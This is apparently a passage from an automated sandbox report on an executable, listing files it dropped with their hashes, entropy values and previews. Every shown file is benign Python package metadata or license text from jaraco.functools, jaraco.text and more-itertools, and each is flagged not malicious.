                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2891
                                                                                                                                                                                                                                            Entropy (8bit):5.034580807599395
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:DEmbsaC3J1x9Ie9okNGwQw8wQw2wTw0zCPU0+I65Jib0H++kv0gM5d0DT+heU04u:DEmgaCZ1nTGDbHRAnzpI6o+fX5dFSwTm
                                                                                                                                                                                                                                            MD5:C2E6BDA7F1B03B39BF42D31B6DBF6C38
                                                                                                                                                                                                                                            SHA1:B7A18F079DE22D10C4C318E54BD8C48177F91333
                                                                                                                                                                                                                                            SHA-256:8B86946900D7FA38DD1102B9C1EBE17A0CB1F09C8B7E29F61F2BDA4A4DC51ECA
                                                                                                                                                                                                                                            SHA-512:F4E892B3D41482E3B17642B1D722B6E2A8E8DD4833F0623C29ED2D50D55CFC68DA1F9756B4E08723DC89F3E552424096C92912AC4DA533FE8E2DC59DC19EA9CF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: jaraco.functools.Version: 4.0.1.Summary: Functools like those found in stdlib.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/jaraco.functools.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: more-itertools.Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest >=6 ;
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):843
                                                                                                                                                                                                                                            Entropy (8bit):5.807846597836061
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Tmn/2zDRvbqfuggoaGnXamZlKZBX3vpBvt+c0X4yWJV:TmnuXRzUuggDifZlmX/aWJV
                                                                                                                                                                                                                                            MD5:85FB54BAFB143CD57D1787F7EF74FDB2
                                                                                                                                                                                                                                            SHA1:A915BBCDF108A58F3DFC1783D9D4DD3B7F3CE23A
                                                                                                                                                                                                                                            SHA-256:632AA7C04F7C4BCC01C027AF5B9BC76FE8958F4A181035B957A3BD3014BA248B
                                                                                                                                                                                                                                            SHA-512:2A39B4C6F221F88EC61D584C8CD3CAD358E8C7B50E529192105A0A4144ED3C2A4CE8B630C39C18D20E27FE226A23E2DE23CDFF8E3D3693959B165A9A2F9047CD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.functools-4.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.functools-4.0.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.functools-4.0.1.dist-info/METADATA,sha256=i4aUaQDX-jjdEQK5wevhegyx8JyLfin2HyvaSk3FHso,2891..jaraco.functools-4.0.1.dist-info/RECORD,,..jaraco.functools-4.0.1.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.functools-4.0.1.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/functools/__init__.py,sha256=hEAJaS2uSZRuF_JY4CxCHIYh79ZpxaPp9OiHyr9EJ1w,16642..jaraco/functools/__init__.pyi,sha256=gk3dsgHzo5F_U74HzAvpNivFAPCkPJ1b2-yCd62dfnw,3878..jaraco/functools/__pycache__/__init__.cpython-312.pyc,,..jaraco/functools/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7
                                                                                                                                                                                                                                            Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                                            MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                                            SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                                            SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                                            SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3658
                                                                                                                                                                                                                                            Entropy (8bit):5.02710641474483
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DYMaCFS802Vpnu388Ksc+fIybwFiR8g6RSwTsL:pFz02Vpnu388KB+gybwgRd6RSwTsL
                                                                                                                                                                                                                                            MD5:70FE732EDE8F8E6C84DA4EA21D4933E5
                                                                                                                                                                                                                                            SHA1:A7763789FA56CEBBAA849368FAAC7D386F170399
                                                                                                                                                                                                                                            SHA-256:03359D9BA56231F0CE3E840C7CB5A7DB380141218949CCAA78DDBD4DCB965D52
                                                                                                                                                                                                                                            SHA-512:4C8D3D5078840BD4DBE20458EBF52890585C5911C22C3EFCE2FB28985461BC80469339DDAF6016FB099C84BDF9B41A26FF1884B456422A8D0C682104D7950D91
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: jaraco.text.Version: 3.12.1.Summary: Module for text manipulation.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/jaraco.text.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: jaraco.functools.Requires-Dist: jaraco.context >=4.1.Requires-Dist: autocommand.Requires-Dist: inflect.Requires-Dist: more-itertools.Requires-Dist: importlib-resources ; python_version < "3.9".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1500
                                                                                                                                                                                                                                            Entropy (8bit):5.794249493238335
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TkLFn/2zDVLFvbqfuaLFo2kXLFGnLFEsJiLFXamdLFlKbkZ6d3JpPXu/1XWXYXw2:TcnuXDzUuuCw5Jmfblyz3Jp2/NUsM0bN
                                                                                                                                                                                                                                            MD5:39FCCE64BC768C2046067E4AAD8465F0
                                                                                                                                                                                                                                            SHA1:2EFC0FC776576A8FE01BBACD0760A49EEE6481DA
                                                                                                                                                                                                                                            SHA-256:816D945741DCA246099388CA3EED74FC0667ACBAA36F70B559B2494C3979B1F6
                                                                                                                                                                                                                                            SHA-512:FB2335A6675F9CADEEE38B666FAB9EA1D8BFBA6B7768253D42F44149591A3239F4B2FA19DDF2C282DC7E47A01D7DCA69AADBBCDAC9107EDBCB2C22D11BA81287
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.text-3.12.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.text-3.12.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.text-3.12.1.dist-info/METADATA,sha256=AzWdm6ViMfDOPoQMfLWn2zgBQSGJScyqeN29TcuWXVI,3658..jaraco.text-3.12.1.dist-info/RECORD,,..jaraco.text-3.12.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..jaraco.text-3.12.1.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.text-3.12.1.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/text/Lorem ipsum.txt,sha256=N_7c_79zxOufBY9HZ3yzMgOkNv-TkOTTio4BydrSjgs,1335..jaraco/text/__init__.py,sha256=Y2YUqXR_orUoDaY4SkPRe6ZZhb5HUHB_Ah9RCNsVyho,16250..jaraco/text/__pycache__/__init__.cpython-312.pyc,,..jaraco/text/__pycache__/layouts.cpython-312.pyc,,..jaraco/text/__pycache__/show-newlines.cpython-312.pyc,,..jaraco/text/__pycache__/strip-prefix.cpython-312.pyc,,..jaraco/text/__py
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7
                                                                                                                                                                                                                                            Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                                            MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                                            SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                                            SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                                            SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (888)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1335
                                                                                                                                                                                                                                            Entropy (8bit):4.226823573023539
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
                                                                                                                                                                                                                                            MD5:4CE7501F6608F6CE4011D627979E1AE4
                                                                                                                                                                                                                                            SHA1:78363672264D9CD3F72D5C1D3665E1657B1A5071
                                                                                                                                                                                                                                            SHA-256:37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
                                                                                                                                                                                                                                            SHA-512:A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1053
                                                                                                                                                                                                                                            Entropy (8bit):5.0945274555157285
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:arOJH7H0yxgtUHw1hC09QHOsUv4eOk4/+/m3oqLFh:aSJrlxEvdQHOs5exm3ogFh
                                                                                                                                                                                                                                            MD5:3396EA30F9D21389D7857719816F83B5
                                                                                                                                                                                                                                            SHA1:0D43A836DAC65C0EA426AD49C881A1086600BF85
                                                                                                                                                                                                                                            SHA-256:09F1C8C9E941AF3E584D59641EA9B87D83C0CB0FD007EB5EF391A7E2643C1A46
                                                                                                                                                                                                                                            SHA-512:D43092223392EDDA3BD777625F5BF54ACB0CC00C25555A4F8A16DB9CCDAFC380D3204486CB2A5FDC9D3F9E459B1FED948FFC7000AA0E40F37B807A01F4421294
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Copyright (c) 2012 Erik Rose..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies.of the Software, and to permit persons to whom the Software is furnished to do.so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH THE SO
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):36293
                                                                                                                                                                                                                                            Entropy (8bit):3.717596190655759
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:bs9cnyPtWIRmL0QnCHx4Zi3XBB9GcF89oi+odVBqCv9d3m24TeYH5AvDpG27IFf5:Ua+H1Nsg/
                                                                                                                                                                                                                                            MD5:5BA05B51B603386707E1E3A101CDD6B3
                                                                                                                                                                                                                                            SHA1:FFCCEC7FD799CC4AB07530954FEF3BE2472E2C23
                                                                                                                                                                                                                                            SHA-256:0453BDD0EF9F2CD89540CA63EE8212E73B73809514419DD3037D8FE471F737E0
                                                                                                                                                                                                                                            SHA-512:FE7F7D6B6C8089B09A18930EF462BA4C7A15EAF6D3E8610AC655ECADE16CE31D9C01ECE84C88A3C2D9DD34DE70E194A020E28179CF33B21389EE3EEFC7229B74
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: more-itertools.Version: 10.3.0.Summary: More routines for operating on iterables, beyond itertools.Keywords: itertools,iterator,iteration,filter,peek,peekable,chunk,chunked.Author-email: Erik Rose <erikrose@grinchcentral.com>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Natural Language :: English.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: Py
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1259
                                                                                                                                                                                                                                            Entropy (8bit):5.794423512787632
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Bhxn/2zDahxvIhxphxBhxEsJXhxzvXiCflBJRHXoggtqgmf7WJhmsxmwG:hnuXwOph5J3zvXi4Lo7qgQ7WJhS
                                                                                                                                                                                                                                            MD5:178EE325409DD28809AD3661E8819EF8
                                                                                                                                                                                                                                            SHA1:F5844FAC6E3C9133FE5F1B8195EE801959801DF3
                                                                                                                                                                                                                                            SHA-256:77C8E73E018DC0FD7E9ED6C80B05A4404545F641FB085220CE42B368B59AA3D3
                                                                                                                                                                                                                                            SHA-512:2DB06B622F644674BF7D7AD8B780F9802858D15D73B5075139C2D82181DD6D589B90172BCA7AE9C785E705F447F523DB2AE641826C550C599551A7D8C2396FC2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:more_itertools-10.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..more_itertools-10.3.0.dist-info/LICENSE,sha256=CfHIyelBrz5YTVlkHqm4fYPAyw_QB-te85Gn4mQ8GkY,1053..more_itertools-10.3.0.dist-info/METADATA,sha256=BFO90O-fLNiVQMpj7oIS5ztzgJUUQZ3TA32P5HH3N-A,36293..more_itertools-10.3.0.dist-info/RECORD,,..more_itertools-10.3.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..more_itertools-10.3.0.dist-info/WHEEL,sha256=rSgq_JpHF9fHR1lx53qwg_1-2LypZE_qmcuXbVUq948,81..more_itertools/__init__.py,sha256=dtAbGjTDmn_ghiU5YXfhyDy0phAlXVdt5klZA5fUa-Q,149..more_itertools/__init__.pyi,sha256=5B3eTzON1BBuOLob1vCflyEb2lSd6usXQQ-Cv-hXkeA,43..more_itertools/__pycache__/__init__.cpython-312.pyc,,..more_itertools/__pycache__/more.cpython-312.pyc,,..more_itertools/__pycache__/recipes.cpython-312.pyc,,..more_itertools/more.py,sha256=1E5kzFncRKTDw0cYv1yRXMgDdunstLQd1QStcnL6U90,148370..more_itertools/more.pyi,sha256=iXXeqt48Nxe8VGmIWpkVXuKpR2FYNuu2DU8nQL
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFML6KjP+tPCCfA5I:Rt1QqL6gWBB3
                                                                                                                                                                                                                                            MD5:FE76A5D309B5416824C2034FBF8A16CD
                                                                                                                                                                                                                                            SHA1:5975EB6043863B0D018A5D751293F38E0B8E2874
                                                                                                                                                                                                                                            SHA-256:AD282AFC9A4717D7C7475971E77AB083FD7ED8BCA9644FEA99CB976D552AF78F
                                                                                                                                                                                                                                            SHA-512:6E4610171DD4E7E49FB4570CF3562D26A4F171FF67DA0F3A259A77916ACB939C8FCA7DA9F473EFAD839947796AC8CD7385DAA3264ADB150FF131A5C0FAC9329C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.8.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):197
                                                                                                                                                                                                                                            Entropy (8bit):4.510719529760597
                                                                                                                                                                                                                                            Encrypted:false
